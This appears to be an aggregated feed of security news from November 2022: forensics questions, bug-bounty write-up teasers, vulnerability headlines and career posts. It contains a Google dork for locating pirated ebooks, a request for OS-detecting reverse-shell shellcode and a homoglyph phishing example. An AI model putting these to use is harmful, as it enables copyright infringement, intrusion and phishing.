    Long story short: My father died last month leaving a large mass of data across 20+ devices (e.g,. computers, thumb drives, backup drives, cloud, etc). I am trying to aggregate and sort through all of this data to find nonduplicate relevant data. As I am sure people in this sub do plenty of large-scale data discovery, I am hoping someone might cue me into best practices for aggregating / sorting / culling / archiving data in a situation like this. Any resources / workflows / tools / processes or directions you might offer would be greatly appreciated. Thanks in advance. submitted by /u/officespace2 [link] [comments]
    Ways to brush up and maintain computer forensics skills
    Some years ago, I acquired an AS in computer forensics. Unfortunately, I do not get to use what I learned on a daily basis. Are there any websites or products that can help me stay updated and educated with sample cases? Or should I just buy an updated college level computer forensics book and use the sample cases provided therein. Thoughts and suggestions greatly appreciated. submitted by /u/lexispots [link] [comments]
    evidence a live USB was used?
    Curious what your experience is with finding evidence that someone booted from a live OS USB. Is there anything that could point to this being done? I was thinking besides seeing the creation USB tools on the machine, you might notice if they turned off any USB protection/live boot security settings in the bios. But if they remembered to turn it back on, I'm not sure this would be detectable? submitted by /u/CrazyKitty2016 [link] [comments]
    Investigating Infected Windows with Volatility Framework | TryHackMe
    submitted by /u/MotasemHa [link] [comments]
  • Open

    Taxii IOC Feeds
    Looking to ingest some additional IOCs into my MS Sentinel instance. Any good Taxii IOC feeds you'd recommend? submitted by /u/Itchy-Criticism-5470 [link] [comments]
    What is the best way to make the most money as a Security Analyst?
    I am currently working as a mid-level Security Analyst and have been doing so for some time now. The job is great but I want to make sure that I'm making the most money that I can while I work as an analyst. I'm willing to look into working for other companies but I don't want to be someone who travels a ton for my work so I'd rather avoid jobs that require that. How can a Security Analyst make the most money doing what they do? submitted by /u/0wlBear916 [link] [comments]
    Fake it until you make it. What do?
    Using buzzwords I got myself a Junior Network Engineer job (I have a business economics degree). I really like this field, but apart from some random Udemy courses (aka pay 10$ not to Google stuff), I feel like I am totally unprepared. They require: - Experience in networking architectures and systems. - Knowledge of network security management (IPS, IDS). - Knowledge of L2 and L3 protocols. Is there a way to shock therapy those concepts into my mind asap? Thanks. submitted by /u/MonteNegro_42069 [link] [comments]
    I am looking for a new blue team cert
    Hello everyone, I am looking for a new blue team cert, but I do have a budget of below $1,000. I just completed the blue team level 1 cert, CYSA+ and ISC2 Certified in Cybersecurity (for fun because it was free). Any suggestions on what I can do next? I really like blue teaming and threat hunting, and since it is Black Friday, I am looking for more training. submitted by /u/Sgtkeebler [link] [comments]
  • Open

    Fastly Subdomain Takeover $2000
    No content preview
    Bug Bounty Tips and Getting Persistence With Electron Applications
    No content preview
    Write-up: Unprotected admin functionality @ PortSwigger Academy
    No content preview
    Must See Sites From The Depths of Dark Web!
    No content preview
  • Open

    Fastly Subdomain Takeover $2000
    No content preview
    Bug Bounty Tips and Getting Persistence With Electron Applications
    No content preview
    Write-up: Unprotected admin functionality @ PortSwigger Academy
    No content preview
    Must See Sites From The Depths of Dark Web!
    No content preview
  • Open

    Fastly Subdomain Takeover $2000
    No content preview
    Bug Bounty Tips and Getting Persistence With Electron Applications
    No content preview
    Write-up: Unprotected admin functionality @ PortSwigger Academy
    No content preview
    Must See Sites From The Depths of Dark Web!
    No content preview
  • Open

    The Rise of Web 3.0 Security
    Web3 Security introduction Continue reading on Medium »
    Working with a scope using Gowitness
    Gowitness is a usefull application written in Golang by @leonjza. According to the gowitness documentation: Continue reading on Medium »
    Interesting Stored XSS via meta data
    Back in February of this year Bibek Neupane and I had hacked on a private bug bounty program on Hackerone, we had chosen one of the social… Continue reading on Pentester Nepal »
    SSRF via DNS Rebinding (CVE-2022–4096)
    Hello everyone myself Basavaraj , Today in this writeup I will explain about my 2nd CVE i.e CVE-2022–4096 Continue reading on Medium »
    OTP BYPASS WithOUT RESPONSE MANIPULATION
    Hii, all! Scriptkiddie is back with a new hacking story. So a few days ago, I was hunting on one of the website where I am able to bypass… Continue reading on Medium »
    Bug Bounty Tips and Getting Persistence With Electron Applications
    By repacking asar files, electron applications, and other bug bounty tips. Starring Signal, Discord, Nordpass, and more Continue reading on InfoSec Write-ups »
    Web Application Advanced Hacking
    A Hands-On Field Guide to latest techniques used by security researchers and bug bounty hunters Continue reading on Medium »
  • Open

    Disrupting an attacker publishing malware to PyPI
    submitted by /u/braincaviar [link] [comments]
    Burp Suite and Protobuf
    submitted by /u/0xdea [link] [comments]
  • Open

    Vulnerable SDK components lead to supply chain risks in IoT and OT environments
    submitted by /u/SCI_Rusher [link] [comments]
    A Dissection Of Nighthawk C2
    submitted by /u/Diesl [link] [comments]
  • Open

    Red Team Fundamentals Write Up
    Learn about the basics of a red engagement, the main components and stakeholders involved, and how red teaming differs from other cyber… Continue reading on Medium »
  • Open

    SecWiki News 2022-11-22 Review
    侦查取证中系统镜像的还原与分析 by ourren 初探Java安全之JavaAgent by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-22 Review
    侦查取证中系统镜像的还原与分析 by ourren 初探Java安全之JavaAgent by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    Serious IT vulnerability found in MG's electric car
    Article URL: https://www.vibilagare.se/english/serious-it-vulnerability-found-mgs-electric-car Comments URL: https://news.ycombinator.com/item?id=33706128 Points: 1 # Comments: 0
  • Open

    Prisoner of War — Hacktoria Contract Walkthrough (Understanding OSINT)
    In this article we are going to solve an OSINT challenge called “Prisoner of War” from Hacktoria Continue reading on Medium »
  • Open

    Support Portal Takeover via Leaked API KEY
    AMBER AI disclosed a bug submitted by khizer47: https://hackerone.com/reports/1766228 - Bounty: $1500
  • Open

    Tenda Ax12 设备分析
    作者:The_Itach1@知道创宇404实验室 日期:2022年11月22日 设备简述 Tenda WiFi6 双频无线路由器工作在2.4GHz和5GHz频段,支持802.11ax技术,双频并发无线速率高达2976Mbps;支持OFDMA技术,实现在同一时刻多个用户同时并行传输,提高数据传输效率;支持宽带账号密码迁移,替换旧路由时,忘记宽带账号密码也不怕;支持IPv6,无需经过地址转换(N...
  • Open

    Tenda Ax12 设备分析
    作者:The_Itach1@知道创宇404实验室 日期:2022年11月22日 设备简述 Tenda WiFi6 双频无线路由器工作在2.4GHz和5GHz频段,支持802.11ax技术,双频并发无线速率高达2976Mbps;支持OFDMA技术,实现在同一时刻多个用户同时并行传输,提高数据传输效率;支持宽带账号密码迁移,替换旧路由时,忘记宽带账号密码也不怕;支持IPv6,无需经过地址转换(N...

  • Open

    Oxeye Finds Bad Spotify Backstage JavaScript Vulnerability
    Article URL: https://thenewstack.io/oxeye-finds-bad-spotify-backstage-javascript-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=33699504 Points: 2 # Comments: 0
    Vulnerability in Tailscale allows a malicious website to access the peer API
    Article URL: https://tailscale.com/security-bulletins/#ts-2022-005 Comments URL: https://news.ycombinator.com/item?id=33695818 Points: 2 # Comments: 0
    A Confused Deputy Vulnerability in AWS AppSync
    Article URL: https://securitylabs.datadoghq.com/articles/appsync-vulnerability-disclosure/ Comments URL: https://news.ycombinator.com/item?id=33694560 Points: 6 # Comments: 0
    ReDoS Vulnerability in Svnurl.py #287
    Article URL: https://github.com/pytest-dev/py/issues/287 Comments URL: https://news.ycombinator.com/item?id=33691134 Points: 1 # Comments: 1
  • Open

    How to look at Amache.hve file of a different computer
    Doing a forensics study for a project and I have a Amcache.hve file I would like to look at to see installation history of the computer. I have tried using applications such as Eric Zimmermans AppCompatCacheParser. However every time I try to run the program it uses my personal Amcache file not the one I am trying to look at. This could be because I am utilizing the path wrong within the command. Regardless of this, my overall question is are there any free softwares such as Autopsy or others where I can look at a Amcache.hve file. submitted by /u/Friendly-Intention-2 [link] [comments]
    How to identify uninstalled apps under iOS?
    I'm analyzing an image of an iPhone. In the knowledgeC.db I found some artifacts that a certain app has been installed on the device. I didn't find the app in the dump and now I'm wondering if the app might have been uninstalled. However, I don't know if there are artifacts that show up when an app is uninstalled, can you help me out on this one? I found the app name in the file /private/var/mobile/Library/Preferences/com.apple.mt.killed.plist. Does this file list uninstalled apps? submitted by /u/F-2016 [link] [comments]
    Let's Talk About MUICache
    Good morning, Happy Thanksgiving week! 📷 Here’s a new 13Cubed episode about MUICache – a Windows forensic artifact that doesn't get a lot of attention. Enjoy! ----- In this episode, we'll take an in-depth look at Windows MUICache. We'll start by reviewing the purpose of this Windows feature, the metadata it collects, and its forensic value in showing evidence of program execution. Then, we'll jump into a demo and see it in action. Episode: https://www.youtube.com/watch?v=ea2nvxN878s Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]
  • Open

    Tools for seccomp analysis
    submitted by /u/boutnaru [link] [comments]
    Fuzzing the web for mysterious bugs
    A really nice blog post from the security researcher 0xacb about REcollapse technique. submitted by /u/hisxo [link] [comments]
    Email Graffiti: Vandalize old emails. It's like an NFT but better. Tool linked in blog
    submitted by /u/wifihack [link] [comments]
    A Confused Deputy Vulnerability in AWS AppSync | Datadog Security Labs
    submitted by /u/RedTermSession [link] [comments]
  • Open

    CVE-2022-41924 – tailscaled can be used to remotely execute code on Windows
    Article URL: https://emily.id.au/tailscale Comments URL: https://news.ycombinator.com/item?id=33695886 Points: 527 # Comments: 99
    CVE-2022-41924 - RCE in Tailscale, DNS Rebinding, and You
    Article URL: https://emily.id.au/tailscale Comments URL: https://news.ycombinator.com/item?id=33695842 Points: 5 # Comments: 0
    Why CVE-2022-3602 was not detected by fuzz testing
    Article URL: http://allsoftwaresucks.blogspot.com/2022/11/why-cve-2022-3602-was-not-detected-by.html Comments URL: https://news.ycombinator.com/item?id=33693873 Points: 186 # Comments: 135
  • Open

    Main app methodology : Bug bounties
    What is a bug bounty? Continue reading on System Weakness »
    Main app methodology : Bug bounties
    What is a bug bounty? Continue reading on Medium »
    Fastly Subdomain Takeover $2000
    WHOAMI My name is Alexandar Thangavel AKA ValluvarSploit, a full-time bug hunter and trainer. I love recon. I am the founder and CEO of… Continue reading on InfoSec Write-ups »
    Fastly Subdomain Takeover $2000
    WHOAMI My name is Alexandar Thangavel AKA ValluvarSploit, a full-time bug hunter and trainer. I love recon. I am the founder and CEO of… Continue reading on Medium »
    Pass the Hash Attack
    We hear about breaches on a daily basis, and sometimes even about system compromises, so what stages does the attacker take and how does… Continue reading on InfoSec Write-ups »
    P1 Bug Hunting: A Step by Step Guide to SQL Injection
    TL;DR- A beginners guide to SQL Injection in bug hunting, and obtaining access to the inner databases of targets. Continue reading on The Gray Area »
    Email Verification Bypass
    Introduction: Continue reading on Medium »
    Defining scopes for bug bounty programs
    Setting the programme scope is the first stage in developing your programme brief, which you should do if you’ve decided that you and your… Continue reading on Medium »
    Root detection analysis and bypass — Rootbeer Library |Beginner | Part 1
    For those who don’t know, I am Ashish (co-founder of Bluefire redteam), We engage with many real-world cybersecurity challenges, and this… Continue reading on Medium »
  • Open

    Anyone familiar with text encryption? Or I’m not exactly sure it that’s the correct term.
    Is anyone familiar with encrypting text? Like character encoding I think it is. Take this message for example ( Yоuг sign in OTP is 822960. Wе will NEVER cаll for this. ) If you have Siri (text yourself) or a computer read this message aloud it will be read differently than it appears. How is this done? I think it may have something to do with Unicode but I’m not sure. submitted by /u/blightedfailure [link] [comments]
    Suricata errors
    HI all, I've been trying to resolve a few issues with Suricata and can't seem to get it working, any help would be much appreciated. sudo suricata -c /etc/suricata/suricata.yaml -r /home/links/fuzz-2020-11-05-11628.pcap 21/11/2022 -- 14:27:28 - - This is Suricata version 6.0.8 RELEASE running in USER mode 21/11/2022 -- 14:27:44 - - [ERRCODE: SC_ERR_PCAP_OPEN_OFFLINE(26)] - failed to get first packet timestamp. pcap_next_ex(): -2 21/11/2022 -- 14:27:44 - - [ERRCODE: SC_ERR_PCAP_DISPATCH(20)] - Failed to init pcap file /home/links/fuzz-2020-11-05-11628.pcap, skipping 21/11/2022 -- 14:27:44 - - Ring buffer initialized with 0 files. 21/11/2022 -- 14:27:44 - - all 3 packet processing threads, 4 management threads initialized, engine started. 21/11/2022 -- 14:27:44 - - [ERRCODE: SC_ERR_INVALID_ARGUMENT(13)] - pcap file reader thread failed to initialize 21/11/2022 -- 14:27:44 - - Signal Received. Stopping engine. submitted by /u/jugonaught [link] [comments]
    How to change SSH port in new ubuntu version? (Tried Many times not working)
    Using VPS with Ubuntu latest and new to linux command. Its for hosting a website. Tried via sudo nano /etc/ssh/sshd_config does not seem to work. Tried ports like 2864 ,31457 but nope :( The default port just does NOT change. Video: https://youtu.be/STtg62zx73k In the video tho u can see I may have used 65564 which is not valid but this was like the 51th attempt. I know it should be less than less than 65535. The default 22 won't just change. Also, when I went to change the port number it was written port and listenaddress is not used when sshd is socket activated. screenshot: https://imgur.com/b2t1ASm This ubuntu thread shows the commands: server - SSH default port not changing (Ubuntu 22.10) - Ask Ubuntu but I am new to linux not familiar with commands. I inputted those commands but did not work. Anyone can help with the proper command? submitted by /u/yoyobono [link] [comments]
    How would a security pro do an ad-hoc reality check on a domain?
    An email from "my phone carrier" (let's call the company `MPC`) came from an unexpected domain, something like "mpc-mail . com" - Used Windows nslookup but the results look like queries are being filtered to the point where only the domain is returned. Test queries to other domains were more forthcoming of course. Using web searches the parent company info eventually surfaced and I concluded it's a legitimate domain associated with the parent company. Nonetheless what's a better resource than just poking around? I tried the IANA whois form but the info returned was for a different objective. submitted by /u/Daddy-ough [link] [comments]
    Hi , was learning some OSINT and a Question stuck me
    We use tools like intelx and dehashed to get the leaked credentials , How does this tools are able to get those leaked credentials are any goole dorking going on behind or anything else. And are their any way to get those leaked credentials without use of this sites ? and are their any google dorks for this ? submitted by /u/geeky_gopher [link] [comments]
  • Open

    Write-up: Basic server-side template injection @ PortSwigger Academy
    No content preview
    Pass the Hash Attack
    We hear about breaches on a daily basis, and sometimes even about system compromises, so what stages does the attacker take and how does… Continue reading on InfoSec Write-ups »
    TryHackMe writeup: AttackerKB
    This article discusses the AttackerKB project and a greater phenomena that it is based off of: the wisdom of the crowds. Continue reading on InfoSec Write-ups »
    [ Malware Analysis #5] — Eternity Project — Eternity Worm
    No content preview
    ‍IW Weekly #34: Attacking SAML 2.0,
    No content preview
  • Open

    Write-up: Basic server-side template injection @ PortSwigger Academy
    No content preview
    Pass the Hash Attack
    We hear about breaches on a daily basis, and sometimes even about system compromises, so what stages does the attacker take and how does… Continue reading on InfoSec Write-ups »
    TryHackMe writeup: AttackerKB
    This article discusses the AttackerKB project and a greater phenomena that it is based off of: the wisdom of the crowds. Continue reading on InfoSec Write-ups »
    [ Malware Analysis #5] — Eternity Project — Eternity Worm
    No content preview
    ‍IW Weekly #34: Attacking SAML 2.0,
    No content preview
  • Open

    Write-up: Basic server-side template injection @ PortSwigger Academy
    No content preview
    Pass the Hash Attack
    We hear about breaches on a daily basis, and sometimes even about system compromises, so what stages does the attacker take and how does… Continue reading on InfoSec Write-ups »
    TryHackMe writeup: AttackerKB
    This article discusses the AttackerKB project and a greater phenomena that it is based off of: the wisdom of the crowds. Continue reading on InfoSec Write-ups »
    [ Malware Analysis #5] — Eternity Project — Eternity Worm
    No content preview
    ‍IW Weekly #34: Attacking SAML 2.0,
    No content preview
  • Open

    SecWiki News 2022-11-21 Review
    以朝鲜黑客为例看如何利用 VirusTotal 进行样本拓线 by Avenger CodeQL的自动化代码审计之路(中篇) by ourren SecWiki周刊(第455期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-21 Review
    以朝鲜黑客为例看如何利用 VirusTotal 进行样本拓线 by Avenger CodeQL的自动化代码审计之路(中篇) by ourren SecWiki周刊(第455期) by ourren 更多最新文章,请访问SecWiki
  • Open

    FreeBuf早报 |印度发布《2022年个人数据保护法案》草案;特朗普在马斯克的民意调查后返回推特
    【全球动态】1.印度政府发布《2022年个人数据保护法案》草案2022年个人数据保护法案》草案旨在确保个人数据的安全,在用户同意的情况下,表明收集信息的目的并确切分类。该草案将在2022年12月17日之前公开征求公众意见。【外刊-阅读原文】2.越南数字威权主义的悄然演变在西方科技巨头的支持下,越南出现了一种新的监控系统,数字权利得正在下降。【阅读原文】3.特朗普在马斯克的民意调查后返回推特马斯克
    印度政府发布《2022年个人数据保护法案》草案
    2022年个人数据保护法案,旨在确保个人数据的安全,在用户同意的情况下,表明收集信息的目的并确切分类。
    CIS 2022网安大会(北京分会场)延期举办通知
    原定于2022年11月30日举办的「CIS 2022网络安全创新大会北京分会场」将延期举办,具体日期确定后将第一时间公布。
  • Open

    Threat Assessment: Luna Moth Callback Phishing Campaign
    Unit 42 investigates Luna Moth/Silent Ransom Group callback phishing extortion campaign that targeted businesses in multiple sectors. The post Threat Assessment: Luna Moth Callback Phishing Campaign appeared first on Unit 42.
  • Open

    How To Social Engineer The Metaverse
    A lot of hacking is playing with other people, you know, getting them to do strange things. Continue reading on Medium »
  • Open

    Open redirect that can lead to malicious websites
    AMBER AI disclosed a bug submitted by mrdot404: https://hackerone.com/reports/1771749
    Dependecy Confusion via Lookup Request Forwarding to PyPi.org
    GitLab disclosed a bug submitted by usd-responsible-disclosure: https://hackerone.com/reports/1681275
  • Open

    Wordpress 插件 woocommerce 插件 SQL 注入漏洞分析
    作者:墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/mlLVIVM4bpQbOV8dVXaJSA 漏洞简述 WooCommerce 一款基于 WordPress 的开源电子商务插件。时至今日已变成全球最流行的电商系统,它是为使用WordPress的小型或大型在线商人而设计的。该插件于2011年9月27日发布,以其易于安装和定制以及免费的基础产品...
    WatchDog 继续瞄准东亚 CSP 公司
    作者:cadosecurity 译者:知道创宇404实验室翻译组 原文链接:https://www.cadosecurity.com/watchdog-continues-to-target-east-asian-csps/ 介绍 Cado实验室的研究人员最近发现黑客WatchDog重新出现。WatchDog是一个机会主义者,也是一个著名的黑客组织,他们经常对各种云服务提供商托管的资源进行加...
  • Open

    Wordpress 插件 woocommerce 插件 SQL 注入漏洞分析
    作者:墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/mlLVIVM4bpQbOV8dVXaJSA 漏洞简述 WooCommerce 一款基于 WordPress 的开源电子商务插件。时至今日已变成全球最流行的电商系统,它是为使用WordPress的小型或大型在线商人而设计的。该插件于2011年9月27日发布,以其易于安装和定制以及免费的基础产品...
    WatchDog 继续瞄准东亚 CSP 公司
    作者:cadosecurity 译者:知道创宇404实验室翻译组 原文链接:https://www.cadosecurity.com/watchdog-continues-to-target-east-asian-csps/ 介绍 Cado实验室的研究人员最近发现黑客WatchDog重新出现。WatchDog是一个机会主义者,也是一个著名的黑客组织,他们经常对各种云服务提供商托管的资源进行加...
  • Open

    Jodorowsky - Moebius
    https://rphv.net/books/Jodorowsky-graphic-novels/ Use this search: +(.MOBI|.CBZ|.CBR|.CBC|.CHM|.EPUB|.FB2|.LIT|.LRF|.ODT|.PDF|.PRC|.PDB|.PML|.RB|.RTF|.TCR) moebius intitle:"index of" -inurl:(jsp|pl|php|html|aspx|htm|cf|shtml) -inurl:(hypem|unknownsecret|sirens|writeups|trimediacentral|articlescentral|listen77|mp3raid|mp3toss|mp3drug|theindexof|index_of|wallywashis|indexofmp3) submitted by /u/Shitemoji69 [link] [comments]

  • Open

    The Best Bug Bounty Hunting Tips and Tricks of 2022
    TL;DR- These are the best resources that I’ve found, and different methods of learning that I’ve used on my bug hunting journey. Continue reading on The Gray Area »
    India’s Centric Bug Bounty Platform with Integrated Bug Bounty Tools
    One year earlier, Cyber3ra announced to build of India’s First Bug Bounty platform. After a year-long wait, Cyber3ra finally unveiled the… Continue reading on Medium »
    Deep Dive into Hidden Web
    How to perform Pentest Recon using Gobuster. Continue reading on InfoSec Write-ups »
    GAS theft attack in Solv Protocol
    Bug Description Continue reading on Medium »
  • Open

    System misconfiguration is the number one vulnerability, at least for Mastodon
    submitted by /u/0xdea [link] [comments]
  • Open

    TEAMs in CYBERSECURITY
    Let’s examine the simple military map presented in Figure 1. Let me explain it to those who don’t know to read a military map. It is an… Continue reading on Medium »
  • Open

    help to spot bufferoverflow in below code
    hi , was learning about buffer overflow's and just thought can buffer overflow occur in the below python code and if Yes then how ?. ​ size = int(input("Enter size of stack: ")) print("Size of stack is: ", size) stk = [] print("Start entering values in stack") for x in range(size): val = int(input()) stk.append(val) print((stk)) submitted by /u/geeky_gopher [link] [comments]
  • Open

    Write-up: Reflected XSS into HTML context with nothing encoded @ PortSwigger Academy
    No content preview
    How I earned $47000 USD as a high school student
    No content preview
    HTB Omni [writeup]
    Exploiting Windows IoT Core using SireRAT Continue reading on InfoSec Write-ups »
    Russian roulette XSS
    No content preview
    Deep Dive into Hidden Web
    No content preview
  • Open

    Write-up: Reflected XSS into HTML context with nothing encoded @ PortSwigger Academy
    No content preview
    How I earned $47000 USD as a high school student
    No content preview
    HTB Omni [writeup]
    Exploiting Windows IoT Core using SireRAT Continue reading on InfoSec Write-ups »
    Russian roulette XSS
    No content preview
    Deep Dive into Hidden Web
    No content preview
  • Open

    Write-up: Reflected XSS into HTML context with nothing encoded @ PortSwigger Academy
    No content preview
    How I earned $47000 USD as a high school student
    No content preview
    HTB Omni [writeup]
    Exploiting Windows IoT Core using SireRAT Continue reading on InfoSec Write-ups »
    Russian roulette XSS
    No content preview
    Deep Dive into Hidden Web
    No content preview
  • Open

    SecWiki News 2022-11-20 Review
    漏洞赏金猎人系列-测试电商类相关功能步骤和Tips-I by 蓝色淡风 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-20 Review
    漏洞赏金猎人系列-测试电商类相关功能步骤和Tips-I by 蓝色淡风 更多最新文章,请访问SecWiki
  • Open

    FreeBuf早报 | 近半数macOS恶意程序来自一个应用;针对中东国家的网络钓鱼攻击在世界杯前翻倍
    在卡塔尔世界杯之前,针对中东的基于电子邮件的网络钓鱼攻击在10月份翻了一倍。
    Reverse_SSH:一款基于SSH的反向Shell工具
    Reverse_SSH上一款基于SSH的反向Shell工具,在该工具的帮助下,广大研究人员可以使用SSH来实现反向Shell。
  • Open

    Thoughts on Teaching Digital Forensics
    When I first started writing books, my "recipe" for how to present the information followed the same structure I saw in other books at the time. While I was writing books to provide content along the lines of what I wanted to see, essentially filling in the gaps I saw in books on DFIR for Windows systems, I was following the same formula other books had used to that point. At the time, it made sense to do this, in order to spur adoption. Later, when I sat down to write Investigating Windows Systems, I made a concerted effort to take a different approach. What I did this time was present a walk-through of various investigations using images available for download on the Internet (over time, some of them were no longer available). I started with the goals (where all investigations must start…
  • Open

    SPY NEWS: 2022 — Week 46
    Summary of the espionage-related news stories for the Week 46 (November 13–19) of 2022. Continue reading on Medium »
    GitFive OSINT tool
    Track down GitHub users Continue reading on Medium »
  • Open

    Am I exposed to some kind of a vulnerability if the file downloads for a very long time?
    Case 1: downloading a file at high speeds and it downloads within minutes. Great. Case 2: downloading a file at very low speeds and it takes a whole day to download it, which isn't necessarily bad because I can do other stuff during that time. But in the case 2, am I exposing myself to some kind of a vulnerability because the connection is "open" for so long? submitted by /u/rockelephant [link] [comments]
  • Open

    No rate limiting for Remove Account lead to huge Mass mailings
    Weblate disclosed a bug submitted by tanvir_0x: https://hackerone.com/reports/1723445
  • Open

    Reverce TCP shellcode that detects operating system and creates a shell based on that? (Linux and Windows)
    Lets assume you have a RCE, something like VMware escape, now that you have escaped and can execute shellcode on the host machine, you need to detect the operating system using your assembly shellcode, and then do a jump based on the operating system and get the reverse TCP based on whether its Windows or Linux. Has anyone already written something like this somewhere like github or..? I specially need to study the part that they are detecting whether its Windows or Linux only by using assembly, and I obviously need that to be a generic way of detecting both of them, and don't want it to only work on certain Linux distributions for example. Anyone here seen something like this before? submitted by /u/BitDrill [link] [comments]
    Vehicle OSINT Collection
    Hey all, I am currently working on a scraping tool that gathers information related to a specific vehicle, and have put together a collection of tools/websites/repositories that assist both my project and individuals performing OSINT investigations. I am looking to expand this collection, and would appreciate any feedback/additions to this collection regarding vehicle data, such as image, license plate, and vin databases/search tools. All feedback is welcome, and please feel free to utilize this collection as you desire. https://github.com/TheBurnsy/Vehicle-OSINT-Collection submitted by /u/Seth-Rogens-Balls [link] [comments]
  • Open

    How hard is it to get into the field?
    Hello, everyone. I'm almost done with a computer science degree, and one of the career fields I've been looking into is computer forensics. I was wondering if I could ask a couple of questions about the field. How hard is it to get your first job? Assuming I have a CS bachelor's and a forensics certification or two--but zero IT work experience. Are good social skills super important? I know that you have to testify in court and explain your findings to people, but I was wondering if it would still be a good career field for someone socially awkward or someone bad at interacting in general. At the moment, I'm kind of torn between web dev and going into this field, but if I'm honest, everything about computer forensics is more interesting to me even if it is slightly harder to break into. I also like coding in Python and automating stuff, which would be a plus. Thank you in advance for any help/advice. submitted by /u/8585858585858 [link] [comments]
    Discovery Attender Boolean Search Expressions
    Hi everyone, I'm trying to do a Boolean search expression on Discovery attender on a bunch of files. These are the words that I got to search: ​ pension /10 lost or gone Aquila or CALPX or California Power Exchange Corporation Walmart burn* Colorado River Commission fire* or smoke Coral and Power and LLC *.doc* and *.xls* and f*.jp* ​ This is the Boolean search expressions that I got so far: ​ (pension NEAR(10) {lost OR gone}) OR (Aquila OR CALPX OR "California Power Exchange Corporation") OR Walmart OR burn* OR ("Colorado River Commission") OR (fire* OR smoke) OR (Coral AND Power AND LLC) OR ​ Discovery attender accepts all the search expression so far but I'm having trouble with the last line as I don't know how to modify the wildcard expressions. ​ *.doc* and *.xls* and f*.jp* ​ Any help will be appreciated. Thank you. submitted by /u/-Melquiades- [link] [comments]
    Xbox Series S Forensic Examination
    Hey all, I just finished a personal project of mine doing an examination into the Series S. I pulled the SSD out and imaged it and brought it into X-Ways. Obviously much of the files were encrypted and/or compressed but I was wondering if there had been any movement on deciphering the .xvd (and variants) file format. There are obviously files of interest that you can see during the examination like GameDVR.xvd that would provide some neat information. I know of the xvdtool developed by emoose on GitHub but was wondering if there's anything anyone heard at the water cooler. Yeah I know you can clone or obtain a search warrant for cloud data at Microsoft but I'm still interested in these files. Especially because the former doesn't provide insight into anything that might have been deleted and/or altered. submitted by /u/YallGottaStopFr [link] [comments]

  • Open

    Career in digital forensics
    Hi all - I think I have secured a digital forensics job with a LEA and was wondering the pros and cons of working in this employment field? How have people found career progression and the potential to learn new skills/upskilling? What’s the operational tempo like? Learning transferable skills that can be used as a DF examiner within LEA…but also take those skills to other government agencies? Banking? Private sector? I know there isn’t a blanket answer, but just wanting some insight from those who have been there and done that. Thanks all submitted by /u/OkGrape5530 [link] [comments]
    How common is something like this? Is it computer forensics job to determine whether malware is the culprit or not?
    submitted by /u/Jorteg31 [link] [comments]
  • Open

    Why v2ray needs a *valid* certificate?
    Is it solely for active probing plausibility? Wonder why I need to trust the chain for personal encrypted connections. submitted by /u/nobodysu [link] [comments]
    question for vulnerability scanner operators
    What are the most common vulnerabilities you deal with day to day and how are they remediated? submitted by /u/Putrid-Security9059 [link] [comments]
    Going Back For My Master's Degree
    Been a long time lurker but haven't posted. Currently 35M who finished his Bachelor's Degree[Bachelors of Information Technology] 2 years ago and wants to go back for my Masters Degree in CyberSecurity. Currently working as an IT Analyst with a few Cyber Security[mostly governance projects] under my belt but I figure a degree is going to get me an actual job with the title. Theres a lot of information out there but its hard to find a good list of schools that have what I am looking for if it even exists at all. I am looking for the following: - Accredited Program - Online/can be mixed but I am in the Metro Detroit Area - Geared towards a mix of management and technical skills - I don't care if the GMAT is required or if any testing is required - if possible under 20k for the entire program[work pays up to 10k a year] If any of you know of a program that exists out there which fills the requirements above? Thanks in advance for any/all help! ​ EDIT: should also note that I've been at this IT Analyst job for over 10 years but have about 2 years of the Cyber Security/Governance project under my belt. I hope this helps. submitted by /u/FootCallus [link] [comments]
    How does VPN hide its encryption key from WiFi HotSpot at startup?
    (Google only shows irrelevant results like) all results say that it does hide everything from wifi admin, but BEFORE that how can this protect the encryption key from being discovered while connecting to the vpn? ​ Because how can you tell a VPN what encryption key will be used without having to send itt unencrypted first? Kind regards :) submitted by /u/StackTraceException [link] [comments]
    Best online Masters in Cybersecurity?
    I enjoyed WGUs BS CSIA degree but their masters seems too easy (people post getting in done in a couple months) and I want to use the GI bill towards a bigger name. Originally I was looking into SANS because all I have are CompTIA, ISC2, and EC Council certs, and I notice lots of jobs look for GIAC. However it is nearly the price of UC Berkeley and top notch schools whose name carry a lot weight (many don't know the name SANS outside of our sphere). SANS sounds cool but almost like a really expensive way to study all of their certs. UC Berkeley requires mandatory 4:30pm-6:30pm daily attendance Mon-Fri which does not work for me working full time in the field. I find that strange in today's world that an online school would demand a mon-fri daily live class. Any recommendations for a flexible online masters? I can do weekly, monthly, even daily deadlines but I can't commit to a live class mon-fri. Please comment your favorite or recommendation!! submitted by /u/Jleslie0329 [link] [comments]
  • Open

    Bug Zero at a Glance [Week 12–18 November]
    Let’s look back at #GEW2022 w/ Bug Zero Continue reading on Bug Zero »
    Russian roulette XSS
    Story Continue reading on InfoSec Write-ups »
    Stealing data using PING
    In Red Teaming exercise once we are inside the internal network of our target, we try to avoid our presence from the network security… Continue reading on System Weakness »
    My Top 7 Favorite Websites to (Legally) Improve My Web-Hacking Skills
    TL;DR- The best places to improve your bug-hunting skills without getting your door kicked down by the cops. Continue reading on The Gray Area »
    My bug bounty journey
    Hi readers, my name is Tarun. This is actually my first write up, the reason behind this write up is that, I always wanted to pursue a… Continue reading on Medium »
  • Open

    SecWiki News 2022-11-19 Review
    美国态势感知之CHARIOT物联网加密项目 by ourren 2022信息安全四大顶会Fuzz论文汇总 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-19 Review
    美国态势感知之CHARIOT物联网加密项目 by ourren 2022信息安全四大顶会Fuzz论文汇总 by ourren 更多最新文章,请访问SecWiki
  • Open

    Reflected XSS in chatbot
    MTN Group disclosed a bug submitted by roland_hack: https://hackerone.com/reports/1735622
  • Open

    4 Videos to Help You At The Start of Your Infosec/Hacking Career
    No content preview
  • Open

